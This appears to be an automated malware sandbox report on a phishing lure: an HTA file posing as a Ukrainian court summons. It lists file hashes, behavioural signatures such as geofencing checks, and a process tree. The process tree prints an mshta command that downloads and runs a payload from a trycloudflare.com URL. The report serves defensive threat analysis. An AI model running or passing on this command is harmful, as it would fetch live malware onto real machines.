Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel: 61s
max time network: 36s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17/10/2024, 16:14
Static task: static1
Behavioral task: behavioral1
  Sample: 420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: 420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
  Resource: win10v2004-20241007-en
Behavioral task: behavioral3
  Sample: 420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
  Resource: win7-20241010-en
Behavioral task: behavioral4
  Sample: 420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
  Resource: win10v2004-20241007-en
General
-
Target: 420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
Size: 498B
MD5: 458c0be42e9713a6c8210964e7c1e293
SHA1: 2b0183263f6d7071a02396644947869f4fc159aa
SHA256: eaaa84f9d583a55e6ab670690763af007e65382f72ac18b46a58aa3c8c163174
SHA512: 9293327437e3a14ce3d134b9c508846430ffa10f1eba7252ac8daa9095741197a2b51ee615ca100906db76b3f280fcc905be2f0a045ab9659cbdcc35aaa89508
Malware Config
Extracted: https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub
Signatures
-
Blocklisted process makes network request (2 IoCs)
flow  pid   Process
8     4012  mshta.exe
10    4012  mshta.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                            Process
Key value queried  \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation  mshta.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Suspicious use of WriteProcessMemory (3 IoCs)
description                        pid   Process    procid_target
PID 4756 wrote to memory of 4012   4756  mshta.exe  86
PID 4756 wrote to memory of 4012   4756  mshta.exe  86
PID 4756 wrote to memory of 4012   4756  mshta.exe  86
Processes
-
C:\Windows\SysWOW64\mshta.exe (level 1)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\420-23015-24_від_10.10.2024\Повістка про виклик до суду в адмініс�.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 4756
  C:\Windows\SysWOW64\mshta.exe (level 2)
    Command line: "C:\Windows\system32\mshta.exe" https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 4012
-